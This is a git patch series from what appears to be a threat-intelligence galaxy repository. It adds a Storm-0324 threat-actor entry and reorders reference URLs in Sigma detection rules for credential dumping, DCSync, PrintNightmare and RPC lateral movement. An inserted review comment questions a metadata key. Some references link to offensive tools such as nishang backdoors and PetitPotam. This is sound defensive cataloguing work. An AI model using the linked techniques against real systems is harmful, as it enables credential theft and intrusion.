From e2fd0058214d3a3482cdb996933d2e1ce0897e61 Mon Sep 17 00:00:00 2001
From: Mathieu Beligon
Date: Fri, 15 Sep 2023 16:29:45 +0200
Subject: [PATCH 01/16] [threat-actors] Add Storm-0324
---
clusters/threat-actor.json | 27 ++++++++++++++++++++++++++-
1 file changed, 26 insertions(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 804d33e..09779d6 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -11646,7 +11646,32 @@
 },
 "uuid": "01ac8b25-492e-444b-891b-968f2694e7b2",
 "value": "MoustachedBouncer"
+ },
+ {
+ "description": "The threat actor that Microsoft tracks as Storm-0324 is a financially motivated group known to gain initial access using email-based initial infection vectors and then hand off access to compromised networks to other threat actors. These handoffs frequently lead to ransomware deployment.",
+ "meta": {
+ "references": [
+ "https://www.microsoft.com/en-us/security/blog/2023/09/12/malware-distributor-storm-0324-facilitates-ransomware-access/",
+ "https://www.proofpoint.com/us/blog/threat-insight/jssloader-recoded-and-reloaded"
+ ],
+ "synonyms": [
+ "DEV-0324",
+ "Sagrid",
+ "TA543"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "5db89188-568d-40d2-9320-5fb4a06fbd51",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "8cb6f57b-9ebb-45a6-a89f-9efdb8065d70",
+ "value": "Storm-0324"
 }
 ],
- "version": 281
+ "version": 282
 }
From 5437fac633ab3c689155a0dd87896b1823cda9f9 Mon Sep 17 00:00:00 2001
From: Alexandre Dulaunoy
Date: Sun, 24 Sep 2023 12:05:54 +0200
Subject: [PATCH 02/16] chg: [sigma] updated
---
clusters/sigma-rules.json | 6838 +++++++++++++++++++++++++++----------
1 file changed, 4956 insertions(+), 1882 deletions(-)
diff --git a/clusters/sigma-rules.json b/clusters/sigma-rules.json
index 1a3589b..569e648 100644
--- a/clusters/sigma-rules.json
+++ b/clusters/sigma-rules.json
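Review bot: The new Storm-0324 entry stores its source URLs under the meta key `"references"`, whereas the galaxy convention I know of — and every sigma-rules.json hunk later in this same patch series — uses `"refs"`; if the surrounding threat-actor.json entries use `"refs"`, any consumer that reads `meta.refs` will silently drop both of this entry's references, so the line should read `"refs": [`. The `related` element links to dest-uuid `5db89188-568d-40d2-9320-5fb4a06fbd51` with type `uses`, but nothing in the hunk identifies which cluster element that is; the Microsoft and Proofpoint references suggest a malware entry (presumably JSSLoader), which should be confirmed against the target cluster so the relationship does not dangle. The `"likely"` estimative-language tag is consistent with the description, which says the group hands off access rather than deploying ransomware itself, and the version bump to 282 matches the single added entry.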
@@ -76,9 +76,9 @@ "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" ], "tags": "No established tags" @@ -134,10 +134,10 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://core.telegram.org/bots/faq", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" ], "tags": [ @@ -246,8 +246,8 @@ "logsource.category": "dns", "logsource.product": "No established product", "refs": [ - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" ], "tags": [ 
@@ -1209,10 +1209,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" ], "tags": [ @@ -1590,8 +1590,8 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/Maka8ka/NGLite", "https://github.com/nknorg/nkn-sdk-go", + "https://github.com/Maka8ka/NGLite", "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" ], 
@@ -1726,12 +1726,12 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://github.com/corelight/CVE-2021-1675", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://github.com/corelight/CVE-2021-1675", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" ], "tags": [ @@ -1863,10 +1863,10 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://tools.ietf.org/html/rfc2929#section-2.1", + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", "https://twitter.com/neu5ron/status/1346245602502443009", - "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", + "https://tools.ietf.org/html/rfc2929#section-2.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" ], "tags": [ 
@@ -1907,8 +1907,8 @@ "logsource.category": "application", "logsource.product": "django", "refs": [ - "https://docs.djangoproject.com/en/1.11/ref/exceptions/", "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", + "https://docs.djangoproject.com/en/1.11/ref/exceptions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" ], "tags": [ @@ -2007,8 +2007,8 @@ "logsource.category": "application", "logsource.product": "spring", "refs": [ - "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection", + "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/spring/spring_spel_injection.yml" ], "tags": [ @@ -2175,9 +2175,9 @@ "logsource.category": "application", "logsource.product": "jvm", "refs": [ + "https://rules.sonarsource.com/java/RSPEC-2755", "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", - "https://rules.sonarsource.com/java/RSPEC-2755", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/jvm/java_xxe_exploitation_attempt.yml" ], "tags": [ 
@@ -2277,10 +2277,10 @@ "logsource.category": "application", "logsource.product": "ruby_on_rails", "refs": [ + "http://edgeguides.rubyonrails.org/security.html", "http://guides.rubyonrails.org/action_controller_overview.html", "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", - "http://edgeguides.rubyonrails.org/security.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ @@ -2313,10 +2313,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", - "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ 
@@ -2349,10 +2349,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], "tags": [ @@ -2375,10 +2375,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" ], "tags": [ 
@@ -2401,10 +2401,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" ], "tags": [ @@ -2437,10 +2437,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" ], "tags": [ 
@@ -2481,10 +2481,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ @@ -2541,10 +2541,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" ], "tags": [ 
@@ -2585,8 +2585,8 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], @@ -2628,10 +2628,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" ], "tags": [ 
@@ -2672,12 +2672,12 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ @@ -2700,9 +2700,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], 
@@ -2735,10 +2735,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], "tags": [ @@ -2761,10 +2761,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" ], "tags": [ 
@@ -2787,10 +2787,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ @@ -2823,9 +2823,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], 
@@ -2849,10 +2849,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" ], "tags": [ 
@@ -2943,11 +2943,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" ], "tags": [ @@ -2981,8 +2981,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" ], "tags": [ 
@@ -3128,8 +3128,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/hlldz/Invoke-Phant0m", "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/hlldz/Invoke-Phant0m", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" ], "tags": [ @@ -3418,9 +3418,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" ], 
@@ -3456,9 +3456,9 @@ "logsource.product": "windows", "refs": [ "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" ], "tags": [ 
@@ -3493,11 +3493,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" ], "tags": [ 
@@ -3531,11 +3531,11 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" ], "tags": [ @@ -3787,8 +3787,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://github.com/codewhitesec/SysmonEnte/", + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" ], 
